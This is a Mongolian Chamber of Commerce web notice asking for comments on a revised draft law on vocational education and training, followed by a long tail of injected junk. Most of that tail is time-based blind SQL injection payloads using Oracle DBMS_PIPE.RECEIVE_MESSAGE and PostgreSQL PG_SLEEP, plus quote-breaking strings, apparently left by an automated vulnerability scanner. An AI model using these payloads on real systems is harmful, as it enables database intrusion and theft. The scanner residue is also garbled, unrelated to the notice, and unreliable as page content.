(+976) 7727-7070
info@mongolchamber.mn
08:30 - 17:30
Ажлын цаг

Мэргэжлийн боловсрол, сургалтын тухай хуулийн шинэчилсэн найруулгын төсөлд санал авах тухай

2021/01/21 301

Хөдөлмөр нийгмийн хамгааллын яамнаас мэргэжлийн боловсрол, сургалтын тухай хуулийг шинэчлэн найруулж хүргүүлсэн байна. Тус хуулийн төсөлд мэргэжлийн боловсрол, сургалтын асуудлыг төрийн захиргааны байгууллага эрхлэх шинэ зохицуулалт, мэргэжийн боловсрол, сургалтын төсөв санхүүжилтийн талаарх зохицуулалтуудыг тусгасан байна.

Иймд та бүхэн хуулийн төсөлтэй танилцаж саналаа tugs-oyun@mongolchamber.mn хаягаар 2021 оны 1 сарын 28-ны дотор ирүүлнэ үү.

Хуулийн төсөл [Файлын формат: *PDF, Файлын хэмжээ: 6,14мб] 

lxbfYeaa
555
lxbfYeaa
1
lxbfYeaa
555
lxbfYeaa
1
lxbfYeaa
@@z5pyr
lxbfYeaa
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
lxbfYeaa
1����%2527%2522
lxbfYeaa
1'"
lxbfYeaa
@@mqTDr
lxbfYeaa
1����%2527%2522
lxbfYeaa
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
lxbfYeaa
1'"
lxbfYeaa
1'"
lxbfYeaa
1����%2527%2522
lxbfYeaa
@@WqRZs
lxbfYeaa
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
lxbfYeaa
@@pGeGq
lxbfYeaa
1'"
lxbfYeaa
1����%2527%2522
lxbfYeaa
1'"
lxbfYeaa
1����%2527%2522
lxbfYeaa
@@OA9l5
lxbfYeaa
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
lxbfYeaa
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
lxbfYeaa
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
lxbfYeaa
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
lxbfYeaa
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
lxbfYeaa
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
lxbfYeaa
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
lxbfYeaa
MCYdZLqm')) OR 902=(SELECT 902 FROM PG_SLEEP(15))--